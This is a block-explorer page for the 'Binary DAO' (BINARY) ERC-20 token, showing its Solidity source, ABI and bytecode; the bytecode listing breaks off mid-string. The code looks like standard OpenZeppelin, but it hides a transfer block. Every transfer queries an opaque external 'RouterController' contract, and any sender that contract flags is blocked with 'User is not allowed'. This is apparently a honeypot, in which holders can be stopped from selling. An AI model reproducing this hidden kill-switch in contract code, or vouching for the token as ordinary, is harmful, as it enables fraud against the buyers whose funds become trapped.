ERC-20
Overview
Max Total Supply
1,000,000,000,000 BINARY
Holders
61
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
5,602,948,764.083733842018102873 BINARYValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
BINARY
Compiler Version
v0.8.18+commit.87f61d96
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-08-26 */ // SPDX-License-Identifier: MIT /** WEBSITE: https://binarydao.financial/ MEDIUM: https://medium.com/@binarydaofinance X. COM: https://x.com/binarydao_ TELEGRAM https://t.me/BinaryDAOfinance */ pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File: @openzeppelin/contracts/access/Ownable.sol // OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol) pragma solidity ^0.8.0; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ // Define interface for TransferController interface RouterController { function isRouted(address _account) external view returns (bool); } abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } } // File: @openzeppelin/contracts/token/ERC20/IERC20.sol // OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); function transfer(address to, uint256 amount) external returns (bool); function allowance(address owner, address spender) external view returns (uint256); function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); } // File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.0; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } // File: @openzeppelin/contracts/token/ERC20/ERC20.sol // OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.0; contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; RouterController public routeController; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_, address _routeControllerAddress) { _name = name_; _symbol = symbol_; routeController = RouterController(_routeControllerAddress); } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-allowance}. */ function allowance(address from, address to) public view virtual override returns (uint256) { return _allowances[from][to]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } function increaseAllowance(address spender, uint256 val) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + val); return true; } function decreaseAllowance(address spender, uint256 val) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= val, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - val); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer( address from, address to, uint256 amount ) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); require(!routeController.isRouted(from), "User is not allowed"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply _balances[to] += amount; } emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {} function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {} } pragma solidity ^0.8.0; contract BINARY is ERC20, Ownable { uint256 private constant INITIAL_SUPPLY = 1000000000000 * 10**18; constructor(address router) ERC20("Binary DAO", "BINARY", router) { _mint(msg.sender, INITIAL_SUPPLY); } function sendTokens(address distroWallet) external onlyOwner { uint256 supply = balanceOf(msg.sender); require(supply == INITIAL_SUPPLY, "Tokens already distributed"); _transfer(msg.sender, distroWallet, supply); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"address","name":"router","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"val","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"val","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"routeController","outputs":[{"internalType":"contract RouterController","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"distroWallet","type":"address"}],"name":"sendTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040523480156200001157600080fd5b506040516200221038038062002210833981810160405281019062000037919062000401565b6040518060400160405280600a81526020017f42696e6172792044414f000000000000000000000000000000000000000000008152506040518060400160405280600681526020017f42494e4152590000000000000000000000000000000000000000000000000000815250828260049081620000b59190620006ad565b508160059081620000c79190620006ad565b5080600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505050506200012c620001206200015260201b60201c565b6200015a60201b60201c565b6200014b336c0c9f2c9cd04674edea400000006200022060201b60201c565b50620008af565b600033905090565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000292576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200028990620007f5565b60405180910390fd5b620002a6600083836200038d60201b60201c565b8060036000828254620002ba919062000846565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200036d919062000892565b60405180910390a362000389600083836200039260201b60201c565b5050565b505050565b505050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620003c9826200039c565b9050919050565b620003db81620003bc565b8114620003e757600080fd5b50565b600081519050620003fb81620003d0565b92915050565b6000602082840312156200041a576200041962000397565b5b60006200042a84828501620003ea565b91505092915050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620004b557607f821691505b602082108103620004cb57620004ca6200046d565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620005357fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620004f6565b620005418683620004f6565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b60006200058e62000588620005828462000559565b62000563565b62000559565b9050919050565b6000819050919050565b620005aa836200056d565b620005c2620005b98262000595565b84845462000503565b825550505050565b600090565b620005d9620005ca565b620005e68184846200059f565b505050565b5b818110156200060e5762000602600082620005cf565b600181019050620005ec565b5050565b601f8211156200065d576200062781620004d1565b6200063284620004e6565b8101602085101562000642578190505b6200065a6200065185620004e6565b830182620005eb565b50505b505050565b600082821c905092915050565b6000620006826000198460080262000662565b1980831691505092915050565b60006200069d83836200066f565b9150826002028217905092915050565b620006b88262000433565b67ffffffffffffffff811115620006d457620006d36200043e565b5b620006e082546200049c565b620006ed82828562000612565b600060209050601f83116001811462000725576000841562000710578287015190505b6200071c85826200068f565b8655506200078c565b601f1984166200073586620004d1565b60005b828110156200075f5784890151825560018201915060208501945060208101905062000738565b868310156200077f57848901516200077b601f8916826200066f565b8355505b6001600288020188555050505b505050505050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620007dd601f8362000794565b9150620007ea82620007a5565b602082019050919050565b600060208201905081810360008301526200081081620007ce565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000620008538262000559565b9150620008608362000559565b92508282019050808211156200087b576200087a62000817565b5b92915050565b6200088c8162000559565b82525050565b6000602082019050620008a9600083018462000881565b92915050565b61195180620008bf6000396000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c8063715018a611610097578063a457c2d711610066578063a457c2d71461029f578063a9059cbb146102cf578063dd62ed3e146102ff578063f2fde38b1461032f57610100565b8063715018a61461023d578063837197b2146102475780638da5cb5b1461026357806395d89b411461028157610100565b806323b872dd116100d357806323b872dd1461018f578063313ce567146101bf57806339509351146101dd57806370a082311461020d57610100565b806306fdde0314610105578063095ea7b31461012357806315ee3f501461015357806318160ddd14610171575b600080fd5b61010d61034b565b60405161011a9190610f5b565b60405180910390f35b61013d60048036038101906101389190611016565b6103dd565b60405161014a9190611071565b60405180910390f35b61015b610400565b60405161016891906110eb565b60405180910390f35b610179610426565b6040516101869190611115565b60405180910390f35b6101a960048036038101906101a49190611130565b610430565b6040516101b69190611071565b60405180910390f35b6101c761045f565b6040516101d4919061119f565b60405180910390f35b6101f760048036038101906101f29190611016565b610468565b6040516102049190611071565b60405180910390f35b610227600480360381019061022291906111ba565b61049f565b6040516102349190611115565b60405180910390f35b6102456104e7565b005b610261600480360381019061025c91906111ba565b6104fb565b005b61026b61056e565b60405161027891906111f6565b60405180910390f35b610289610598565b6040516102969190610f5b565b60405180910390f35b6102b960048036038101906102b49190611016565b61062a565b6040516102c69190611071565b60405180910390f35b6102e960048036038101906102e49190611016565b6106a1565b6040516102f69190611071565b60405180910390f35b61031960048036038101906103149190611211565b6106c4565b6040516103269190611115565b60405180910390f35b610349600480360381019061034491906111ba565b61074b565b005b60606004805461035a90611280565b80601f016020809104026020016040519081016040528092919081815260200182805461038690611280565b80156103d35780601f106103a8576101008083540402835291602001916103d3565b820191906000526020600020905b8154815290600101906020018083116103b657829003601f168201915b5050505050905090565b6000806103e86107ce565b90506103f58185856107d6565b600191505092915050565b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600354905090565b60008061043b6107ce565b905061044885828561099f565b610453858585610a2b565b60019150509392505050565b60006012905090565b6000806104736107ce565b905061049481858561048585896106c4565b61048f91906112e0565b6107d6565b600191505092915050565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6104ef610d7d565b6104f96000610dfb565b565b610503610d7d565b600061050e3361049f565b90506c0c9f2c9cd04674edea40000000811461055f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161055690611360565b60405180910390fd5b61056a338383610a2b565b5050565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600580546105a790611280565b80601f01602080910402602001604051908101604052809291908181526020018280546105d390611280565b80156106205780601f106105f557610100808354040283529160200191610620565b820191906000526020600020905b81548152906001019060200180831161060357829003601f168201915b5050505050905090565b6000806106356107ce565b9050600061064382866106c4565b905083811015610688576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161067f906113f2565b60405180910390fd5b61069582868684036107d6565b60019250505092915050565b6000806106ac6107ce565b90506106b9818585610a2b565b600191505092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610753610d7d565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036107c2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107b990611484565b60405180910390fd5b6107cb81610dfb565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610845576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161083c90611516565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036108b4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108ab906115a8565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516109929190611115565b60405180910390a3505050565b60006109ab84846106c4565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610a255781811015610a17576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a0e90611614565b60405180910390fd5b610a2484848484036107d6565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a9a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a91906116a6565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b09576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b0090611738565b60405180910390fd5b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f5f9a371846040518263ffffffff1660e01b8152600401610b6491906111f6565b602060405180830381865afa158015610b81573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ba59190611784565b15610be5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bdc906117fd565b60405180910390fd5b610bf0838383610ec1565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610c76576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c6d9061188f565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610d649190611115565b60405180910390a3610d77848484610ec6565b50505050565b610d856107ce565b73ffffffffffffffffffffffffffffffffffffffff16610da361056e565b73ffffffffffffffffffffffffffffffffffffffff1614610df9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610df0906118fb565b60405180910390fd5b565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610f05578082015181840152602081019050610eea565b60008484015250505050565b6000601f19601f8301169050919050565b6000610f2d82610ecb565b610f378185610ed6565b9350610f47818560208601610ee7565b610f5081610f11565b840191505092915050565b60006020820190508181036000830152610f758184610f22565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610fad82610f82565b9050919050565b610fbd81610fa2565b8114610fc857600080fd5b50565b600081359050610fda81610fb4565b92915050565b6000819050919050565b610ff381610fe0565b8114610ffe57600080fd5b50565b60008135905061101081610fea565b92915050565b6000806040838503121561102d5761102c610f7d565b5b600061103b85828601610fcb565b925050602061104c85828601611001565b9150509250929050565b60008115159050919050565b61106b81611056565b82525050565b60006020820190506110866000830184611062565b92915050565b6000819050919050565b60006110b16110ac6110a784610f82565b61108c565b610f82565b9050919050565b60006110c382611096565b9050919050565b60006110d5826110b8565b9050919050565b6110e5816110ca565b82525050565b600060208201905061110060008301846110dc565b92915050565b61110f81610fe0565b82525050565b600060208201905061112a6000830184611106565b92915050565b60008060006060848603121561114957611148610f7d565b5b600061115786828701610fcb565b935050602061116886828701610fcb565b925050604061117986828701611001565b9150509250925092565b600060ff82169050919050565b61119981611183565b82525050565b60006020820190506111b46000830184611190565b92915050565b6000602082840312156111d0576111cf610f7d565b5b60006111de84828501610fcb565b91505092915050565b6111f081610fa2565b82525050565b600060208201905061120b60008301846111e7565b92915050565b6000806040838503121561122857611227610f7d565b5b600061123685828601610fcb565b925050602061124785828601610fcb565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061129857607f821691505b6020821081036112ab576112aa611251565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006112eb82610fe0565b91506112f683610fe0565b925082820190508082111561130e5761130d6112b1565b5b92915050565b7f546f6b656e7320616c7265616479206469737472696275746564000000000000600082015250565b600061134a601a83610ed6565b915061135582611314565b602082019050919050565b600060208201905081810360008301526113798161133d565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006113dc602583610ed6565b91506113e782611380565b604082019050919050565b6000602082019050818103600083015261140b816113cf565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061146e602683610ed6565b915061147982611412565b604082019050919050565b6000602082019050818103600083015261149d81611461565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611500602483610ed6565b915061150b826114a4565b604082019050919050565b6000602082019050818103600083015261152f816114f3565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611592602283610ed6565b915061159d82611536565b604082019050919050565b600060208201905081810360008301526115c181611585565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006115fe601d83610ed6565b9150611609826115c8565b602082019050919050565b6000602082019050818103600083015261162d816115f1565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611690602583610ed6565b915061169b82611634565b604082019050919050565b600060208201905081810360008301526116bf81611683565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611722602383610ed6565b915061172d826116c6565b604082019050919050565b6000602082019050818103600083015261175181611715565b9050919050565b61176181611056565b811461176c57600080fd5b50565b60008151905061177e81611758565b92915050565b60006020828403121561179a57611799610f7d565b5b60006117a88482850161176f565b91505092915050565b7f55736572206973206e6f7420616c6c6f77656400000000000000000000000000600082015250565b60006117e7601383610ed6565b91506117f2826117b1565b602082019050919050565b60006020820190508181036000830152611816816117da565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611879602683610ed6565b91506118848261181d565b604082019050919050565b600060208201905081810360008301526118a88161186c565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006118e5602083610ed6565b91506118f0826118af565b602082019050919050565b60006020820190508181036000830152611914816118d8565b905091905056fea2646970667358221220eb14cd010aacded8d9ac9401fd946abe4a3b5651794bacc7cae06e0ecef3b1df64736f6c63430008120033000000000000000000000000a6cbbf40f80340c4848006373ff00227c2dfce19
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101005760003560e01c8063715018a611610097578063a457c2d711610066578063a457c2d71461029f578063a9059cbb146102cf578063dd62ed3e146102ff578063f2fde38b1461032f57610100565b8063715018a61461023d578063837197b2146102475780638da5cb5b1461026357806395d89b411461028157610100565b806323b872dd116100d357806323b872dd1461018f578063313ce567146101bf57806339509351146101dd57806370a082311461020d57610100565b806306fdde0314610105578063095ea7b31461012357806315ee3f501461015357806318160ddd14610171575b600080fd5b61010d61034b565b60405161011a9190610f5b565b60405180910390f35b61013d60048036038101906101389190611016565b6103dd565b60405161014a9190611071565b60405180910390f35b61015b610400565b60405161016891906110eb565b60405180910390f35b610179610426565b6040516101869190611115565b60405180910390f35b6101a960048036038101906101a49190611130565b610430565b6040516101b69190611071565b60405180910390f35b6101c761045f565b6040516101d4919061119f565b60405180910390f35b6101f760048036038101906101f29190611016565b610468565b6040516102049190611071565b60405180910390f35b610227600480360381019061022291906111ba565b61049f565b6040516102349190611115565b60405180910390f35b6102456104e7565b005b610261600480360381019061025c91906111ba565b6104fb565b005b61026b61056e565b60405161027891906111f6565b60405180910390f35b610289610598565b6040516102969190610f5b565b60405180910390f35b6102b960048036038101906102b49190611016565b61062a565b6040516102c69190611071565b60405180910390f35b6102e960048036038101906102e49190611016565b6106a1565b6040516102f69190611071565b60405180910390f35b61031960048036038101906103149190611211565b6106c4565b6040516103269190611115565b60405180910390f35b610349600480360381019061034491906111ba565b61074b565b005b60606004805461035a90611280565b80601f016020809104026020016040519081016040528092919081815260200182805461038690611280565b80156103d35780601f106103a8576101008083540402835291602001916103d3565b820191906000526020600020905b8154815290600101906020018083116103b657829003601f168201915b5050505050905090565b6000806103e86107ce565b90506103f58185856107d6565b600191505092915050565b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600354905090565b60008061043b6107ce565b905061044885828561099f565b610453858585610a2b565b60019150509392505050565b60006012905090565b6000806104736107ce565b905061049481858561048585896106c4565b61048f91906112e0565b6107d6565b600191505092915050565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffff